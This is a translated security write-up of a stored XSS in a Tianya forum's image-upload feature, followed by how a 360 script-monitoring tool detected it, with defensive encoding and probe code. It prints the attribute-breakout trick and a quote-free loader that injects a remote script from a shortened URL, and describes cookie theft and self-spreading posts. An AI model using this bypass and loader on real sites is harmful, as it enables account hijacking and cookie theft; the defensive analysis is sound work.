Communication XSS analysis of a large network community

Source: Internet
Author: User

This XSS exists in an inconspicuous sub-forum of Tianya and can be triggered by publishing a new post.


Vulnerability Analysis
The forum applies some filtering against XSS, such as escaping single and double quotation marks and filtering left and right angle brackets, so a generic XSS blind injection does not work.
The breakthrough lies in the function for uploading network images when posting.

After the image is uploaded it is displayed in the post body, that is, the image URL is placed directly into the SRC attribute of an IMG tag. Because the forum filters angle brackets, the payload cannot break out of the IMG tag and can only act inside it. If the forum does not strictly check double quotation marks, the following idea can be used: break out of the double quotation marks of src and use the onerror/onload events to execute arbitrary JS code.
As the figure shows, the check is only done on the front end, so it does not matter; the request can be modified with Burp Suite.

It turns out that although the code is inserted successfully, the JS does not execute: the first double quotation mark is escaped with a backslash, and because the image fails to load, the onload event is never triggered. Using onerror instead works, as shown in the figure.

If we really want to achieve something, popping a box is not enough; we need to load a remote JS file, so the alert(1) in the payload must be replaced:

    s = document.createElement("script");
    s.src = "http://t.cn/?xxx"; // the JS URL is shortened with a Weibo short URL to keep the payload short
    document.body.appendChild(s);

In this way a script tag is created dynamically to load external JS. Written like this, however, it will fail: do not forget that the forum escapes single and double quotation marks, so the code above is changed slightly:

    s = document.createElement(document.head.children[1].tagName); // document.head.children[1] is a SCRIPT tag already present in the page; this avoids quotation marks
    s.src = String.fromCharCode(104) + String.fromCharCode(116) ......; // the URL converted to ASCII character codes; avoids quotation marks
    document.body.appendChild(s);
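The root cause above is that the forum escaped quotation marks with a backslash, which HTML does not recognise as an escape character inside an attribute. The following is an added example (not code from the original post or from the forum) that puts that weak filter beside a hardened renderer; function names and the sample URL are assumptions.

```javascript
// Added example: backslash-escaping a quote inside an HTML attribute does not
// stop the quote from closing the attribute. Names here are assumptions.

// Weak filter as the article describes it: angle brackets stripped and
// quotation marks prefixed with a backslash. The quote still terminates src.
function weakFilter(url) {
  return url.replace(/[<>]/g, "").replace(/["']/g, (q) => "\\" + q);
}

// Hardened version: every character meaningful inside a quoted attribute is
// replaced by an entity, and only http(s) URLs are accepted at all.
function attributeEncode(value) {
  return value.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[c]);
}

function safeImageUrl(url) {
  let parsed;
  try {
    parsed = new URL(url);            // rejects anything that is not a URL
  } catch (e) {
    return null;
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") return null;
  return attributeEncode(parsed.href); // normalised, then attribute-encoded
}

function renderImgWeak(url) {
  return '<img src="' + weakFilter(url) + '">';
}

function renderImgSafe(url) {
  const src = safeImageUrl(url);
  return src === null ? "" : '<img src="' + src + '">';
}

// Counts attributes in the rendered tag; a src that breaks out of its quotes
// produces more than one, which is the condition a reviewer should test for.
function attributeCount(tag) {
  return (tag.match(/\s[a-z]+=/gi) || []).length;
}

// Constructed sample input: an image URL carrying a stray event attribute.
const SAMPLE = 'http://example.invalid/a.png" onerror=x';
```

With the weak filter the sample renders as a tag with two attributes; with the hardened renderer it stays a single, harmless src.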
With the cookie, one can log on to almost all of the sub-sites.

Cookie stealing is therefore probably what hackers are best at; the various domestic XSS platforms have ready-made interfaces for it.
What else can be done? A request can be constructed that posts in various sections; users who see the post click through to the XSS page and, without knowing it, their own accounts are used to forward comments to still more users. The number of victims grows exponentially, and so does the number of cookies the hackers harvest.
By constructing the following XSS code, the target user can be made to post in a specified section or reply to someone. If a "big V" (a verified, widely followed account) is hit, the spread is astonishing.

The other party can also be made to add you as a friend automatically, so that you see all of their future status updates; without noticing, you become a "big V":

Of course, the other party can also be made to post status updates and comments on their own Weibo posts, which plays a large role in dissemination.

When hackers control so many user accounts and their cookies, there is a lot they can do: send advertisements in bulk, SEO, sell users' personal data, even DDoS, and so on.
Vulnerability capture
Many alarms similar to the case above were captured on the 360 alert platform. By analysing the alarm contents, webmasters were able to learn of and fix the vulnerability almost immediately.

This is the alarm content for this event, from which a lot of information can be read. The alarm type shows that the webpage called an unknown third-party script. The event_stack records the webpage's behaviour as a sequence of events: the alarm was triggered by creating a SCRIPT tag and then setting its SRC attribute to http://t.cn/xxxx, as shown in the following figure.

As analysed above, the hackers steal and keep the victim's cookie, then call a comment interface and, through CSRF, automatically post comments promoting a website without the user's knowledge.
By the time the vulnerability was fixed, the XSS page had been accessed more than times. However, no user was found to be affected through a Google search, because the webmaster had configured the watcher in the default blocking mode: the malicious JavaScript was not executed, so this security event caused no substantial harm.
The 360 watcher currently has six plug-ins defending against six different types of XSS attack. In this event it was the "third-party resource probe" plug-in that fired.

This plug-in is something of a mixed blessing, because it has a high "false alarm" rate. On analysis there are two reasons:
1. Browser advertising plug-ins and traffic tampered with by operators
Before writing this plug-in I only wanted to quietly stop XSS from making a mess, but I had not realised how complicated the domestic front-end environment is. When an alarm shows that a page contains an unauthorised remote JS insert, that JS code is often not found in the original page at all. When we analyse the JS files, they frequently turn out to be plain advertisements. The reason is that some program installed on the user's system has embedded an advertising plug-in into the browser. You can open
chrome://plugins/
to check whether such plug-ins are installed.
In addition, to increase revenue and hijack traffic, operators in some regions embed advertising code directly into web pages, leading to "misjudgements" by the watcher.
So if you want to know which operators and plug-ins are hijacking your traffic, you can try this feature.
2. Incorrect whitelist configuration
Configuring the watcher is a bit like falling in love: you have to turn a girl with unlimited freedom into a good wife and mother.
The whitelist is the main basis on which the watcher judges XSS. If it is configured badly there will be many false positives, and if the handling method is set to blocking mode, normal page functions will be affected.
Domain names that need to be whitelisted generally fall into these categories:
- domains of static media files such as JS, CSS and images
- domains of iframe resources
- domains used for advertising
- domains used for statistics
- domains used for web chat
- domains used for Weibo and other promotion functions
We recommend setting the "dangerous treatment method" to "allow" when first introducing the watcher.

That way, even configuration errors do not affect normal page operation. Meanwhile, watch the alarms: if a false alarm appears, add the third-party domain that caused it to the whitelist. After a short period of "training" in this way, blocking mode can be switched on.
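The probe, the whitelist and the allow/block modes described in this section come together in the following added example (not 360's code); the class, its method names and the constructed scenario are assumptions, and in a real deployment the two methods would be driven from hooks on createElement and the src setter.

```javascript
// Added example, not 360's code: the core decision logic of a
// "third-party resource probe" as the article describes it. It records an
// event stack of page behaviours; when a SCRIPT element receives a src whose
// host is neither the page's own nor whitelisted, it raises an alarm and, in
// "block" mode, refuses the load. Names and the event format are assumptions.
function hostAllowed(host, whitelist) {
  // An entry covers the domain itself and every subdomain of it.
  return whitelist.some((d) => host === d || host.endsWith("." + d));
}
class ResourceProbe {
  constructor(pageOrigin, whitelist, mode) {
    this.pageHost = new URL(pageOrigin).hostname;
    this.whitelist = whitelist.map((d) => d.toLowerCase());
    this.mode = mode;       // "allow" = report only, "block" = also refuse
    this.eventStack = [];   // ordered record of what the page did
    this.alarms = [];
  }
  // Called from a createElement hook in a real deployment.
  createElement(tagName) {
    this.eventStack.push({ op: "createElement", tag: tagName.toUpperCase() });
  }
  // Called from a setAttribute/src-setter hook; returns whether the load may proceed.
  setAttribute(tagName, name, value) {
    const tag = tagName.toUpperCase();
    this.eventStack.push({ op: "setAttribute", tag, name, value });
    if (tag !== "SCRIPT" || name.toLowerCase() !== "src") return true;
    let host;
    try {
      host = new URL(value, "http://" + this.pageHost).hostname.toLowerCase();
    } catch (e) {
      host = "";            // unparsable src: treat as an unknown third party
    }
    if (host === this.pageHost || hostAllowed(host, this.whitelist)) return true;
    this.alarms.push({ type: "unknown third-party script", host,
                       eventStack: this.eventStack.slice() });
    return this.mode !== "block";
  }
}

// Constructed scenario: a page on www.example.test whitelists only its CDN,
// loads its own app.js, then has a script injected from a short-URL domain.
function demo(mode) {
  const probe = new ResourceProbe("http://www.example.test", ["static.example.test"], mode);
  probe.createElement("script");
  const ownLoad = probe.setAttribute("script", "src", "//static.example.test/app.js");
  probe.createElement("script");
  const injectedLoad = probe.setAttribute("script", "src", "http://t.cn/xxxx");
  return { ownLoad, injectedLoad, alarms: probe.alarms.length };
}
```

In "allow" mode the injected script is only reported, which is the training phase the text recommends; in "block" mode the same alarm also refuses the load.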